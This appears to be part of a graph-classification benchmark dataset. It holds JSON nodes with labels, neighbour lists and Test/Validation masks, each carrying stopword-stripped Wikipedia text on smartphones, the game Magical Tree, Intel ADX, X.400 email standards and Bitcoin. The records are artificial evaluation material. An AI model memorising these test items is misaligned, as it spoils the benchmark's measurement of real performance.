    "text": "Smartphone:smartphone smartphones class mobile phones multi-purpose mobile computing devices distinguished feature phones stronger hardware capabilities extensive mobile operating systems facilitate wider software internet including web browsing mobile broadband multimedia functionality including music video cameras gaming alongside core phone functions voice calls text messaging smartphones typically include various sensors leveraged software magnetometer proximity sensors barometer gyroscope accelerometer support wireless communications protocols bluetooth wi-fi satellite navigation early smartphones marketed primarily towards enterprise market attempting bridge functionality standalone personal digital assistant pda devices support cellular telephony limited bulky form short battery life immaturity wireless data services issues eventually resolved advances mosfet mos transistor lithium-ion battery mobile network technologies 2000s ntt docomo i-mode platform blackberry nokia symbian platform windows mobile began gain market traction models often featuring qwerty keyboards resistive touchscreen input emphasizing access push email wireless internet since unveiling iphone 2007 majority smartphones featured thin slate-like form factors large capacitive screens support multi-touch gestures rather physical keyboards offer ability users download purchase additional applications centralized store use cloud storage synchronization virtual assistants well mobile payment services improved hardware faster wireless communication due standards lte bolstered growth smartphone industry third quarter 2012 one billion smartphones use worldwide global smartphone sales surpassed sales figures feature phones early 2013 development smartphone enabled advances mosfet metal-oxide-silicon field-effect transistor semiconductor device fabrication mosfet mos transistor invented mohamed atalla dawon kahng bell labs 1959 basic building block computing devices smartphones mosfet scaling mos transistors get smaller decreasing power consumption enabled large-scale integration vlsi technology mos transistor counts integrated circuit chips increasing exponential pace predicted moore law continuous mosfet scaling eventually made possible build portable smart devices smartphones 1990s2000s typical smartphone built billions tiny mosfets 2019 used integrated circuits microprocessors memory chips power devices thin-film transistors tfts mobile displays advances mosfet power electronic technology also enabled development digital wireless mobile networks essential smartphone wide adoption power mosfet ldmos lateral diffused mos rf cmos radio frequency cmos devices led development proliferation digital wireless mobile networks 1990s advances mosfet technology leading increasing bandwidth 2000s essential elements wireless mobile networks built mosfets including mobile tranceivers base station modules routers rf power amplifiers telecommunication circuits rf circuits radio transceivers networks 2g 3g 4g another important enabling factor lithium-ion battery became indispensable energy source smartphones lithium-ion battery invented john goodenough rachid yazami akira yoshino 1980s commercialized sony asahi kasei 1991 advances mosfet technology enabling smaller integrated circuit chips improving wireless mobile networks ibm engineer frank canova realised chip-and-wireless technology becoming small enough use handheld devices first commercially available device could properly referred smartphone began prototype called angler developed canova 1992 ibm demonstrated november year comdex computer industry trade show refined version marketed consumers 1994 bellsouth name simon personal communicator addition placing receiving cellular calls touchscreen-equipped simon could send receive faxes emails included address book calendar appointment scheduler calculator world time clock notepad well visionary mobile applications maps stock reports news ibm simon manufactured mitsubishi electric integrated features wireless personal digital assistant pda cellular radio technologies building ibm simon also featured liquid-crystal display lcd pc card support internal hardware includes nec vadem vg230 system-on-a-chip soc sony hitachi random-access memory ram chips intel hitachi flash memory chips cirrus logic modem chips simon commercially unsuccessful particularly due bulky form factor limited battery life using nicad batteries rather lithium-ion battery used modern smartphones term smart phone smartphone coined year introduction simon appearing print early 1995 describing phonewriter communicator beginning mid-late 1990s many people mobile phones carried separate dedicated pda device running early versions operating systems palm os newton os symbian windows ce/pocket pc operating systems would later evolve early mobile operating systems smartphones era hybrid devices combined existing familiar pda oses basic phone hardware results devices bulkier either dedicated mobile phones pdas allowed limited amount cellular internet access pda mobile phone manufacturers competed reducing size devices bulk smartphones combined high cost expensive data plans plus drawbacks expansion limitations decreased battery life compared separate standalone devices generally limited popularity early adopters business users needed portable connectivity march 1996 hewlett-packard released omnigo 700lx modified hp 200lx palmtop pc nokia 2110 mobile phone piggybacked onto rom-based software support 640×200 resolution cga compatible four-shade gray-scale lcd screen could used place receive calls create receive text messages emails faxes also 100 dos 5.0 compatible allowing run thousands existing software titles including early versions windows august 1996 nokia released nokia 9000 communicator digital cellular pda based nokia 2110 integrated system based pen/geos 3.0 operating system geoworks two components attached hinge became known clamshell design display physical qwerty keyboard pda provided e-mail calendar address book calculator notebook applications text-based web browsing could send receive faxes closed device could used digital cellular telephone june 1999 qualcomm released pdq smartphone cdma digital pcs smartphone integrated palm pda internet connectivity subsequent landmark devices included 1999 japanese wireless provider ntt docomo launched i-mode new mobile internet platform provided data transmission speeds 9.6 kilobits per second access web services available platform online shopping ntt docomo i-mode used chtml language restricted aspects traditional html favor increasing data speed devices limited functionality small screens limited bandwidth allowed phones use slower data speeds available rise i-mode helped ntt docomo accumulate estimated 40 million subscribers end 2001 ranked first market capitalization japan second globally power would later wane face rise 3g new phones advanced wireless network capabilities japanese cell phones increasingly diverged global standards trends offer forms advanced services functionality mobile payments near-field communication nfc 1seg mobile television smartphones still rare outside japan introduction danger hiptop 2002 saw moderate success among u.s. consumers t-mobile sidekick later mid-2000s business users u.s. started adopt devices based microsoft windows mobile blackberry smartphones research motion american users popularized term crackberry 2006 due blackberry addictive nature outside u.s. japan nokia seeing success smartphones based symbian originally developed psion personal organisers popular smartphone os europe middle late 2000s initially nokia symbian smartphones focused business eseries similar windows mobile blackberry devices time 2006 onwards nokia started producing consumer-focused smartphones popularized entertainment-focused nseries 2010 symbian world widely used smartphone operating system 2000s common smartphones physical t9 numeric keypad qwerty keyboard either candybar sliding form factor smartphones resistive touchscreens allowed virtual keyboards handwriting input finger stylus thus also allowing easy entry asian characters 2007 lg prada first mobile phone released large capacitive touchscreen later year apple computer introduced iphone iphone also designed around large capacitive touchscreen added support multi-touch gestures interactions pinching zoom photos web pages phones notable abandoning use stylus keyboard keypad typical smartphones time favor capacitive touchscreen direct finger input input type invention touchscreen smartphone often attributed apple iphone n't first phone touchscreen although made smartphone know today something mainstream due company popularity us lesser extent worldwide made interacting smartphones touchscreen popular following iphone success despite high retail price us 500 smartphone manufacturers started use basic design iphone iphone first smartphone conventional terms ... platform device allows software installed year later followed platforms like palmos symbian windows mobile allowing apps installed apple app store online distribution platform present phone controlled monetized apple became common means smartphone software distribution installation first iphone also faced criticism supporting latest 3g wireless network standards praised hardware software design june 2007 release met heavy demand customers waiting lines outside apple store locations among first purchase screen-focused hardware phones centered around capacitive touchscreen stimulated software focus features web browser designed render full web pages opposed stripped wap services multimedia functionality videos online services maps apps key factor success form factor advantages design around capacitive touchscreen affected development another smartphone os platform android blackberry-like prototype device scrapped favor touchscreen device slide-out physical keyboard google engineers thought time touchscreen could completely replace physical keyboard buttons first android device htc dream released september 2008 although android adoption relatively slow first started gaining widespread popularity 2010 largely due functionality low price early 2012 dominated smartphone market share worldwide continues day android based around modified linux kernel makes linux widely used operating system worldwide also makes android widely used general purpose operating system worldwide apple iphones widespread rich developed countries relatively poor developing countries iphone high end android smartphone considered luxury and/or part social status android iphone devices popularized smartphone form factor based large capacitive touchscreen led decline earlier keyboard- keypad-focused platforms microsoft instance discontinued windows mobile started new touchscreen-oriented os scratch called windows phone nokia abandoned symbian partnered microsoft use windows phone smartphones windows phone became third-most-popular smartphone os replaced windows 10 mobile declined share become largely irrelevant less 0.5 smartphone market palm replaced palm os webos blackberry limited formerly known research motion known phones full qwerty keyboard screen made new platform based qnx blackberry 10 possible control device without press physical buttons mid-2010s almost smartphones touchscreen-only android iphone smartphones dominated market early 2010s larger smartphones screen sizes least 5.5 inches diagonal dubbed phablets began achieve popularity samsung galaxy note series gaining notably wide adoption 2013 huawei launched huawei mate series sports 6.1-inch hd 1280 x 720 ips+ lcd display considered quite large back day 2013 fairphone launched first socially ethical smartphone london design festival address concerns regarding sourcing materials manufacturing followed shiftphone 2015 late 2013 qsalpha commenced production smartphone designed entirely around security encryption identity protection companies began release smartphones incorporating flexible displays create curved form factors samsung galaxy round lg g flex october 2013 motorola mobility announced project ara concept modular smartphone platform would allow users customize upgrade phones add-on modules attached magnetically frame ara retained google following sale motorola mobility lenovo shelved 2016 year lg motorola unveiled smartphones featuring limited form modularity accessories lg g5 allowed accessories installed via removal battery compartment moto z utilizes accessories attached magnetically rear device first smartphone fingerprint reader motorola atrix 4g 2011 september 2013 iphone 5s unveiled first smartphone major u.s. carrier since atrix feature technology 2014 1440p displays began appear high-end smartphones 2015 sony released xperia z5 premium featuring 4k resolution display although images videos could actually rendered resolution software upscaled 1080p microsoft expanding upon concept motorola short-lived webtop unveiled functionality windows 10 operating system phones allows supported devices docked use pc-styled desktop environment major technologies began trend 2016 including focus virtual reality augmented reality experiences catered towards smartphones newly introduced usb-c connector improving lte technologies 2015 global median smartphone ownership 43 statista forecast 2.87 billion people would smartphones 2020 new trends smartphone displays began emerge 2017 lg samsung releasing flagship smartphones utilizing displays taller aspect ratios common ratio designs allow display larger diameter slimmer width 16:9 displays equivalent screen size another trend popularized year displays contained tab-like cut-outs top-centre—colloquially known notch —to contain front-facing camera sometimes sensors typically located along top bezel device designs allow edge-to-edge displays take nearly entire height device little bezel along top design characteristic popularized essential phone featured circular tab camera iphone x used wider tab contain camera facial scanning system 2018 first smartphones featuring fingerprint readers embedded within oled displays announced followed 2019 implementation using ultrasonic sensor samsung galaxy s10 2019 4.7-inches 5.5 inches become industry standard size companies abandoning smaller 4.7-inch displays smartphones foldable displays theorized possible manufacturing costs production processes feasible november 2018 startup company royole unveiled first commercially available foldable smartphone royole flexpai also month samsung presented prototype phone featuring infinity flex display developers conference smaller outer display cover larger tablet-sized display opened samsung stated also develop new polymer material coat display opposed glass early examples foldable phones manufacturers became subject rumors early 2019 samsung officially announced galaxy fold based previously-demonstrated prototype february 2019 originally-scheduled release late-april smartphones central processing units cpus similar computers optimised operate low power environments performance mobile cpu depends clock rate generally given multiples hertz also memory hierarchy challenges performance mobile phone cpus often appropriately given scores derived various standardized tests measure real effective performance commonly used applications one main characteristics smartphones screen depending device design screen fills nearly space device front surface many smartphone displays aspect ratio taller aspect ratios became common 2017 screen sizes measured diagonal inches phones screens larger 5.2 inches often called phablets smartphones screens 4.5 inches size commonly difficult use single hand since thumbs reach entire screen surface may need shifted around hand held one hand manipulated used place hands due design advances modern smartphones large screen sizes edge-to-edge designs compact builds improve ergonomics shift taller aspect ratios resulted phones larger screen sizes whilst maintaining ergonomics associated smaller 16:9 displays liquid-crystal displays common others ips led oled amoled displays displays integrated pressure-sensitive digitizers developed wacom samsung apple force touch system audio quality enhancing features voice lte hd voice appeared often available newer smartphones sound quality remain problem due design phone quality cellular network compression algorithms used long distance calls audio quality improved using voip application wifi cellphones small speakers user use speakerphone feature talk person phone without holding ear small speakers also used listen digital audio files music speech watch videos audio component without holding phone close ear end 2017 smartphone battery life become generally adequate however earlier smartphone battery life poor due weak batteries could handle significant power requirements smartphones computer systems color screens smartphone users purchase additional chargers use outside home work cars buying portable external battery packs external battery packs include generic models connected smartphone cable custom-made models piggyback onto smartphone case 2016 samsung recall millions galaxy note 7 smartphones due explosive battery issue consumer convenience wireless charging stations introduced hotels bars public spaces wide range accessories sold smartphones including cases screen protectors power charging cables wireless power stations usb on-the-go adapters connecting usb drives cases hdmi cable external monitor add-on batteries headphones combined headphone-microphones example allow person privately conduct calls device without holding ear bluetooth-enabled powered speakers enable users listen media smartphones wirelessly cases range relatively inexpensive rubber soft plastic cases provide moderate protection bumps good protection scratches expensive heavy-duty cases combine rubber padding hard outer shell cases book -like form cover user opens use device cover closed protects screen book -like cases additional pockets credit cards thus enabling people use wallets accessories include products sold manufacturer smartphone compatible products made manufacturers mobile operating system mobile os operating system phones tablets smartwatches mobile devices mobile operating systems combine features personal computer operating system features useful mobile handheld use usually including following considered essential modern mobile systems touchscreen cellular bluetooth wi-fi protected access wi-fi global positioning system gps mobile navigation video- single-frame picture cameras speech recognition voice recorder music player near field communication infrared blaster q1 2018 383 million smartphones sold 85.9 percent running android 14.1 percent running ios negligible number smartphones running oses android alone popular popular desktop operating system windows general smartphone use even without tablets exceeds desktop use mobile devices mobile communications abilities e.g. smartphones contain two mobile operating systemsthe main user-facing software platform supplemented second low-level proprietary real-time operating system operates radio hardware research shown low-level systems may contain range security vulnerabilities permitting malicious base stations gain high levels control mobile device mobile app computer program designed run mobile device smartphone term app short-form term software application introduction apple app store iphone ipod touch july 2008 popularized manufacturer-hosted online distribution third-party applications software computer programs focused single platform huge variety apps including video games music products business tools point smartphone application distribution depended third-party sources providing applications multiple platforms getjar handango handmark pocketgear following success app store smartphone manufacturers launched application stores google android market later renamed google play store rim blackberry app world android-related app stores like f-droid february 2014 93 mobile developers targeting smartphones first mobile app development since 1996 smartphone shipments positive growth november 2011 27 photographs created taken camera-equipped smartphones september 2012 study concluded 4 5 smartphone owners use device shop online global smartphone sales surpassed sales figures feature phones early 2013 worldwide shipments smartphones topped 1 billion units 2013 38 2012 725 million comprising 55 share mobile phone market 2013 42 2012 q1 2016 first time shipments dropped 3 percent year year situation caused maturing china market 2011 samsung highest shipment market share worldwide followed apple 2013 samsung 31.3 market share slight increase 30.3 2012 apple 15.3 decrease 18.7 2012 huawei lg lenovo 5 significantly better 2012 figures others 40 previous years figure apple lost market share although shipment volume still increased 12.9 rest significant increases shipment volumes 36–92 q1 2014 samsung 31 share apple 16 q4 2014 apple 20.4 share samsung 19.9 q2 2016 samsung 22.3 share apple 12.9 q1 2017 idc reported samsung first placed 80 million units followed apple 50.8 million huawei 34.6 million oppo 25.5 million vivo 22.7 million samsung mobile business half size apple revenue apple business increased rapidly years 2013 2017 2012 university southern california study found unprotected adolescent sexual activity common among owners smartphones study conducted rensselaer polytechnic institute rpi lighting research center lrc concluded smartphones backlit devices seriously affect sleep cycles persons might become psychologically attached smartphones resulting anxiety separated devices smombie combination smartphone zombie walking person using smartphone paying attention walk possibly risking accident process increasing social phenomenon issue slow-moving smartphone users led temporary creation mobile lane walking chongqing china issue distracted smartphone users led city augsburg germany embed pedestrian traffic lights pavement many countries mobile phones used provide mobile banking services may include ability transfer cash payments secure sms text message kenya m-pesa mobile banking service example allows customers mobile phone operator safaricom hold cash balances recorded sim cards cash deposited withdrawn m-pesa accounts safaricom retail outlets located throughout country transferred electronically person person used pay bills companies branchless banking successful south africa philippines pilot project bali launched 2011 international finance corporation indonesian bank bank mandiri another application mobile banking technology zidisha us-based nonprofit micro-lending platform allows residents developing countries raise small business loans web users worldwide zidisha uses mobile banking loan disbursements repayments transferring funds lenders united states borrowers rural africa mobile phones use internet mobile payments first trialled finland 1998 two coca-cola vending machines espoo enabled work sms payments eventually idea spread 1999 philippines launched country first commercial mobile payments systems mobile operators globe smart mobile phones make mobile payments via direct mobile billing schemes contactless payments phone point sale support near field communication nfc enabling contactless payments nfc-equipped mobile phones requires co-operation manufacturers network operators retail merchants mobile phone use driving—including calling text messaging playing media web browsing gaming using mapping apps operating phone features—is common controversial since widely considered dangerous due known distracted driving distracted operating motor vehicle shown increase risk accidents september 2010 us national highway traffic safety administration nhtsa reported 995 people killed drivers distracted phones march 2011 us insurance company state farm insurance announced results study showed 19 drivers surveyed accessed internet smartphone driving many jurisdictions prohibit use mobile phones driving egypt israel japan portugal singapore handheld hands-free calling mobile phone uses speakerphone banned countries including uk france many us states use calling handheld phones banned hands-free use permitted 2011 study reported 90 college students surveyed text initiate reply read driving scientific literature danger driving sending text message mobile phone texting driving limited simulation study university utah found sixfold increase distraction-related accidents texting due complexity smartphones began grow introduced additional difficulties law enforcement officials attempting distinguish one usage another drivers using devices apparent countries ban handheld hands-free usage rather ban handheld use officials easily tell function phone used simply looking driver lead drivers stopped using device illegally call fact using device legally example using phone incorporated controls car stereo gps satnav 2010 study reviewed incidence phone use cycling effects behavior safety 2013 national survey us reported number drivers reported using phones access internet driving risen nearly one four study conducted university vienna examined approaches reducing inappropriate problematic use mobile phones using phones driving accidents involving driver distracted call phone begun prosecuted negligence similar speeding united kingdom 27 february 2007 motorists caught using handheld phone driving three penalty points added license addition fine £60 increase introduced try stem increase drivers ignoring law japan prohibits use phones driving including use hands-free devices new zealand banned handheld phone use since 1 november 2009 many states united states banned text messaging phones driving illinois became 17th american state enforce law july 2010 30 states banned texting driving kentucky becoming recent addition july 15 public health law research maintains list distracted driving laws united states database laws provides comprehensive view provisions laws restrict use mobile devices driving 50 states district columbia 1992 first law passed december 1 2010 dataset contains information 22 dichotomous continuous categorical variables including example activities regulated e.g. texting versus talking hands-free versus handheld calls web browsing gaming targeted populations exemptions patent war samsung apple started latter claimed original galaxy android phone copied interfaceand possibly hardwareof apple ios iphone 3gs also smartphone patents licensing litigation involving sony mobile google apple inc. samsung microsoft nokia motorola htc huawei zte among others conflict part wider patent wars multinational technology software corporations secure increase market share companies granted patent sue prevent competitors using methods patent covers since 2010s number lawsuits counter-suits trade complaints based patents designs market smartphones devices based smartphone oses android ios increased significantly initial suits countersuits rulings license agreements major events began 2009 smartphone market stated grow rapidly 2012 apps allows sending receiving facsimile fax smartphone including facsimile data composed raster bi-level graphics generated directly digitally document image file formats rise number mobile medical apps market place government regulatory agencies raised concerns safety use applications concerns transformed regulation initiatives worldwide aim safeguarding users untrusted medical advice smartphone malware easily distributed insecure app store often malware hidden pirated versions legitimate apps distributed third-party app stores malware risk also comes known update attack legitimate application later changed include malware component users install notified app updated well one three robberies 2012 united states involved theft mobile phone online petition urged smartphone makers install kill switches devices 2014 apple find iphone google android device manager locate disable wipe data phones lost stolen blackberry protect os version 10.3.2 devices rendered unrecoverable even blackberry operating system recovery tools incorrectly authenticated dissociated account leaked documents published wikileaks codenamed vault 7 dated 2013–2016 detail capabilities united states central intelligence agency cia perform electronic surveillance cyber warfare including ability compromise operating systems smartphones including ios android guidelines mobile device security issued nist many organizations conducting private in-person meeting least one site recommends user switch smartphone disconnect battery using smartphones late night disturb sleep due blue light brightly lit screen affects melatonin levels sleep cycles effort alleviate issues several apps change color temperature screen warmer hue based time day reduce amount blue light generated developed android ios 9.3 integrated similar system-level functionality known night shift amazon released feature known blue shade fire os bellini 5.0 later also theorized users addicted use phones especially go bed result ego depletion many people also use phones alarm clocks also lead loss sleep pocket cameras difficulty producing bokeh images nowadays smartphones dual-lens cameras produce bokeh effect easily even rearrange level bokeh shooting iphone 7 plus debuted dual-lens camera back smartphone advanced smartphones may come 'quad cameras two dual-lens cameras honor 9 lite smartphone back front smartphone 13mp main lens 2mp lens capturing depth information evercoss u50a max smartphone 4 cameras costs less 100 huawei p20 pro smartphone triple lenses back smartphone launched bokeh camera smartphone optical zoom first lens 40mp rgb second lens 20mp monochrome third lens 8mp rgb telephoto 3x zoom enhanced 5x combination optical zoom megapixel lens 40mp rgb produce undeteriorated optical+digital zoom digital zoom without loss quality",
    "neighbors": [
      10242,
      8196,
      6,
      2057,
      2066,
      2072,
      10271,
      6178,
      4132,
      40,
      6186,
      8237,
      2111,
      10303,
      6212,
      69,
      6216,
      8280,
      10332,
      8285,
      97,
      119,
      6266,
      8315,
      8316,
      4225,
      4228,
      8326,
      10388,
      10393,
      154,
      6301,
      2208,
      4259,
      8355,
      6310,
      167,
      10410,
      8367,
      2235,
      4283,
      4291,
      196,
      199,
      4305,
      2258,
      2259,
      4309,
      8413,
      2273,
      4324,
      8423,
      236,
      2285,
      6391,
      6408,
      4364,
      280,
      8472,
      10525,
      4383,
      288,
      8486,
      297,
      10537,
      4399,
      2361,
      10557,
      321,
      332,
      2383,
      4435,
      6486,
      10583,
      6495,
      10599,
      6505,
      4464,
      2420,
      4475,
      2430,
      8576,
      8577,
      2445,
      2449,
      10645,
      2458,
      10660,
      424,
      10674,
      8627,
      2492,
      448,
      6595,
      2502,
      456,
      2508,
      464,
      6618,
      2526,
      495,
      499,
      8698,
      2558,
      10761,
      4623,
      8719,
      529,
      10768,
      10770,
      6695,
      6705,
      10802,
      582,
      2630,
      2635,
      4685,
      10838,
      8794,
      6748,
      4701,
      607,
      2658,
      6763,
      8812,
      8822,
      2679,
      8829,
      6783,
      10884,
      8842,
      6797,
      2707,
      669,
      673,
      8870,
      8886,
      8900,
      2759,
      6870,
      8919,
      8921,
      10971,
      2788,
      6884,
      10986,
      8940,
      2802,
      2828,
      4883,
      4890,
      798,
      2852,
      8997,
      821,
      823,
      2875,
      6981,
      11079,
      11082,
      6987,
      11084,
      9042,
      6996,
      854,
      4957,
      9063,
      2925,
      9101,
      7063,
      9115,
      2977,
      2978,
      11170,
      2982,
      11175,
      937,
      9129,
      11184,
      2993,
      2994,
      7108,
      970,
      5100,
      11252,
      5125,
      11271,
      11272,
      7182,
      5143,
      9244,
      11294,
      7212,
      9262,
      1073,
      9266,
      7220,
      7222,
      5175,
      1089,
      3140,
      11337,
      9292,
      7246,
      3152,
      9296,
      5202,
      7253,
      11349,
      3162,
      5211,
      3168,
      1121,
      1136,
      11377,
      11391,
      3205,
      9356,
      5261,
      5262,
      9366,
      5274,
      5290,
      9391,
      3248,
      1216,
      9408,
      7370,
      3281,
      5331,
      1251,
      3300,
      9443,
      1255,
      7399,
      7400,
      3323,
      3330,
      7428,
      5382,
      5384,
      1290,
      7446,
      11545,
      9499,
      5406,
      1313,
      9523,
      5431,
      1346,
      7490,
      5444,
      7492,
      3398,
      7498,
      5454,
      3409,
      5467,
      7515,
      1377,
      5475,
      7527,
      1400,
      7548,
      9605,
      11655,
      9610,
      1424,
      5522,
      1427,
      3483,
      7579,
      7581,
      7595,
      9646,
      7614,
      7617,
      1480,
      3537,
      3542,
      9688,
      3561,
      1516,
      5612,
      5613,
      1524,
      3573,
      5620,
      7669,
      1533,
      9732,
      5637,
      9741,
      3600,
      9745,
      7700,
      5659,
      3618,
      1578,
      3626,
      7722,
      5677,
      7723,
      7727,
      5681,
      9781,
      1602,
      1603,
      1615,
      3664,
      1633,
      1650,
      7812,
      1670,
      9863,
      5777,
      7835,
      7837,
      5791,
      7857,
      7866,
      7869,
      1728,
      7877,
      7893,
      9948,
      9949,
      1761,
      5857,
      1772,
      5869,
      9964,
      1776,
      5872,
      5875,
      3828,
      5877,
      5892,
      1802,
      7958,
      3865,
      10009,
      10023,
      7983,
      3900,
      10045,
      10053,
      5963,
      8019,
      10080,
      3940,
      8044,
      5998,
      10095,
      6001,
      10101,
      10102,
      3959,
      1930,
      3978,
      10129,
      8083,
      1949,
      4003,
      6057,
      8109,
      1969,
      2001,
      4051,
      10199,
      4061,
      4068,
      10215,
      10223,
      10227
    ],
    "mask": "Test"
  },
  {
    "node_id": 1084,
    "label": 3,
    "text": "Magical_Tree:magical tree konami included magical tree 1998 game anthology konami antiques msx collection vol 2 playstation player character indian brave stereotype wears tanned vest trousers headband feather player ascends magical tree hopping branch branch climbing vines ladders—while also dodging larvae owls lightning bolts player jump dangle branches earns points gathering apples arrows daggers coronets tree 2004 meters tall gauge tracks player altitude conclusion level game informs player much climb reach goal castle treetop ascent divided nine game levels player character dances conclusion level player clears ninth level curtain opens reveal castle top tree smiling crenels castle parapet young woman purple frock man wearing war bonnet end sequence game continues base tree",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1085,
    "label": 3,
    "text": "Intel_ADX:intel adx intel adx multi-precision add-carry instruction extensions intel arbitrary-precision arithmetic extension x86 instruction set architecture isa intel adx first supported broadwell microarchitecture instruction set extension contains two new instructions though codice_1 bmi2 also considered part large integer arithmetic support instructions efficient variants existing codice_2 instruction difference two new instructions affects one flag codice_2 signed addition may set overflow carry flags old-style x86 instruction also reset rest cpu flags two versions affecting different flags means two chains additions carry calculated parallel amd added support processors instructions starting ryzen",
    "neighbors": [
      9092,
      2821,
      4491,
      6924,
      4237,
      4622,
      6038,
      9369,
      9500,
      2088,
      9391,
      1972,
      8120,
      8506,
      6971,
      8125,
      8126,
      704,
      833,
      7234,
      9541,
      3142,
      6730,
      7755,
      5326,
      977,
      2514,
      5844,
      9428,
      8795,
      3294,
      2655,
      1122,
      7783,
      1000,
      9959,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      4217,
      4603,
      10620,
      6911
    ],
    "mask": "Test"
  },
  {
    "node_id": 1086,
    "label": 5,
    "text": "X.400:x.400 x.400 suite itu-t recommendations define standards data communication networks message handling systems mhs — commonly known email one time designers x.400 expecting predominant form email role taken smtp-based internet e-mail despite widely used within organizations core part microsoft exchange server 2006 variants continue important military aviation contexts first x.400 recommendations published 1984 red book substantially revised version published 1988 blue book new features added 1992 white book subsequent updates although x.400 originally designed run adaptation allow operation tcp/ip rfc 1006 become popular way run x.400 developed cooperation iso x.400-series recommendations specify osi standard protocols exchanging addressing electronic messages companion f.400-series recommendations define message handling services built message handling systems mhs well access mhs public services late 1990s itu-t consolidated recommendations f.400 x.400 published itu-t f.400/x.400 06/1999 recommendation message handling system service overview x.400-series recommendations define technical aspects mhs itu-t rec x.402 iso/iec 10021-2 defines overall system architecture mhs itu-t rec x.411 iso/iec 10021-4 defines message transfer service mts functional component message transfer agent mta itu-t rec x.413 iso/iec 10021-5 defines message store itu-t recommendations provide specific terms descriptions system entities procedures example messages email exchanged among people referred interpersonal messaging ipm electronically structured business documents e.g. invoices purchase orders dispatch advice etc exchanged among trading partners ’ computers fall edi protocols message handling distributed information processing task integrates two related subtasks message transfer message storage itu-t recommendations define specific protocols wide range communication tasks example p1 protocol used explicitly communication among mtas p3 user agent mta p7 user agent message store 1994 version p7 enhanced provide folders message store allow storage submitted messages provide many automatic actions auto-foldering correlation replies delivery reports receipt notifications submitted messages x.400 message content standards defined communication user agents modelled conceptual protocols treat p1 p3/p7 providing underlying reliable transport message contents message content standard interpersonal messaging ipm defined itu-t rec x.420 iso/iec 10021-7 named p2 red book extended version ipm blue book given content-type 22 p2 version 2 often referred informally p22 although term used standards message content standard edi defined itu-t rec f.435 iso/iec 10021-8 itu-t rec x.435 iso/iec 10021-9 informally referred p35 voice messaging content type defined itu-t recs f.440 x.440 exchange server 2007 use mta object x.400 connector must use mta gone exchange server 2007 longer x.400 default proxy e-mail addresses exchange server 2007 important features x.400 include structured addressing asn.1 binary code enabling multimedia content predating efficient mime integrated security capabilities x.400 inter-domain relay services assumed itu run ptts x.400 incorporated fields automated transfer messages x.400 ptt services telex facsimile physical postal mail iso later added open routing standards itu-t rec x.412 iso/iec 10021-10 itu-t rec x.404 iso/iec 10021-11 initial misconception x.400 required ptt relay services coupled ptt volume-based charges factors inhibited widespread uptake x.400 late 1980s many major countries committed osi stack via gosip government open systems interconnection profiles united states form 1990 nist federal information processing standard fips 146 turn major computer vendors committed producing osi-compliant products including x.400 microsoft exchange server developed time period internally based x.400/x.500 initial release equally happy dispatch messages via messaging api mapi x.400 simple mail transfer protocol smtp practice however poorly produced seldom put operation north america many large defense contractors universities also already committed internet tcp/ip standards including smtp email x.400 still used applications military intelligence services aviation mainly x.400 functions integrity security developed deployed much earlier smtp counterparts s/mime pgp smtp-tls similar reasons sometimes used transmission edi messages applications europe south america asia x.400 quite widely implemented especially edi services x.400 extended use military applications see mmhs aviation see amhs one core issues x.400 attempted address failure email properly delivered address specified correctly time addressing formats varied platform platform difficult users know properly type error caused delivery fail outright contrast real postal service even partial addresses would routed dead letter office attempt deliver even information missing wrong solve problem x.400 address scheme included several redundant fields could used help deliver message instance separate fields first last name well initials server identified multiple fields including company organization name well country idea address misspelt name company instance would still contain enough information person name country message properly routed time believed email would provided large service providers often national telephone companies meant long message reached service provider indicated administration management domain admd portion address system would likely know user question service provider likely national scope simply providing right country code could enough information route message properly however model fails email services provided user company organization service provider known case national-scale database users improper organization name enough cause fail dominant model today companies use internal server even commonly use provider like gmail invisible outside organization even users model admd unknown organization multi-part addressing system also led format complex users sure fields important tended provide could made trivial things like printing address business card typing email client difficult simpler systems like found smtp unwieldiness addressing format believed many one factor lack success x.400 x.400 address technically referred originator/recipient address two purposes x.400 address consists several elements including standards originally specify email addresses written instance business card even whether field identifiers upper lower case character sets allowed rfc 1685 specified one encoding based 1993 draft itu-t recommendation f.401 looked like 1984 two forms address formats 1988 x.400 recommendations four forms addressing delineated 1984 form 1 variant 1 format renamed mnemonic o/r address 1984 form 1 variant 3 form 2 format combined renamed terminal o/r address new forms introduced numeric o/r form variation form 1 variant 2 postal o/r address first large-scale use conducted u.s. military communication contract 1992 1997 confusion caused x.400 addressing format led creation x.500 standard directory services idea create hierarchical standardized email address directory replication distribution functionality allowed multiple organizations produce single public directory instance administration management domain service provider could optionally upload directory shared x.500 server allow database searched x.400 user agents email creation thereby avoiding needing know anything address recipient name sort organizational name like company unfortunately x.500 protocol proved every bit complex unwieldy x.400 led creation lightweight directory access protocol ldap standardized simple subset x.500 protocols suitable use end-user software searching addresses ldap widely used directory services like microsoft active directory additionally goal providing universal address database fundamentally flawed time proposed era national telecommunications companies like bell canada france télécom people names phone numbers considered public information already collected directories form phone book extending email addresses seemed obvious however simply case 1980s time email often associated business government users organizations treated addresses valuable even confidential reason organizations share information anyone else rfc2693 put imagine cia adding directory agents world-wide x.500 pool",
    "neighbors": [
      929,
      4194,
      10886,
      8202,
      8283,
      334,
      1297,
      9909,
      10238,
      6651,
      1049,
      5531,
      6110
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1087,
    "label": 5,
    "text": "Bitcoin:bitcoin bitcoin ₿ cryptocurrency decentralized digital currency without central bank single administrator sent user user peer-to-peer bitcoin network without need intermediaries transactions verified network nodes cryptography recorded public distributed ledger called blockchain bitcoin invented unknown person group people using name satoshi nakamoto released open-source software 2009 bitcoins created reward process known mining exchanged currencies products services research produced university cambridge estimates 2017 2.9 5.8 million unique users using cryptocurrency wallet using bitcoin bitcoin criticized use illegal transactions high electricity consumption price volatility thefts exchanges reputable economists stating zero price bitcoin also used investment although several regulatory agencies issued investor alerts bitcoin domain name bitcoin.org registered 18 august 2008 31 october 2008 link paper authored satoshi nakamoto titled bitcoin peer-to-peer electronic cash system posted cryptography mailing list nakamoto implemented bitcoin software open-source code released january 2009 nakamoto identity remains unknown 3 january 2009 bitcoin network created nakamoto mined first block chain known genesis block embedded coinbase block text times 03/jan/2009 chancellor brink second bailout banks note references headline published times interpreted timestamp comment instability caused fractional-reserve banking receiver first bitcoin transaction cypherpunk hal finney created first reusable proof-of-work system rpow 2004 finney downloaded bitcoin software release date 12 january 2009 received ten bitcoins nakamoto early cypherpunk supporters creators bitcoin predecessors wei dai creator b-money nick szabo creator bit gold 2010 first known commercial 